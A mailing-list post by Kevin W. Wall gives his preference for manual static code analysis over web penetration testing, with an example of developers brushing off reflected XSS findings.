What do you like better Web penetration testing or static code analysis?

[kevin.w.wall at gmail.com (Kevin W. Wall)]

Matt Parsons wrote:
> What do you like doing better as application security professionals, web
> penetration testing or static code analysis?

McGovern, James F. (P+C Technology) wrote:
> Should a security professional have a preference when both have
> different value propositions? While there is overlap, a static analysis
> tool can find things that pen testing tools cannot. Likewise, a pen test
> can report on secure applications deployed insecurely which is not
> visible to static analysis.
>
> So, the best answer is I prefer both...

While I realize that both are necessary and each have their own
pros and cons, my personal preference is to do static code analysis,
especially if it involves old-fashioned manual code inspections.

The reason for that I like getting closer to the source code.
Maybe that's just because it seems like I'm getting back to
my development roots. (I worked as a developer for the first half
of my career.) I find the advantages of dealing with source code
is that you are able to spot the exact problem as well as offer
more specific fixes. And working at the source code level gives
me more opportunities to work closely with the development teams
where I am able to explain to them in terms of their own code what
is going on and how a vulnerability can be fixed.

When approaching vulnerabilities from a pen testing level, I find
all to often that the developers do not believe that there is anything
wrong or if they do, they don't believe that it is serious enough that
it needs to be fixed. (For instance, it is not uncommon that when
developers are presented with results from a pen test that show that
they have non-persistent (reflective) XSS vulnerabilities present,
that I get the response "Yeah, but that's not going to happen. First
you would have to get a authenticated user to click on that link and
they would never do that." Apparently they don't believe that those
doing phishing ever catch any victims.) However, when I'm dealing with
source code, that objection generally does not come up...perhaps
because I can show them right then and there how to remediate the
issue.

-kevin
-- 
Kevin W. Wall
"The most likely way for the world to be destroyed, most experts agree,
is by accident. That's where we come in; we're computer professionals.
We cause accidents."        -- Nathaniel Borenstein, co-creator of MIME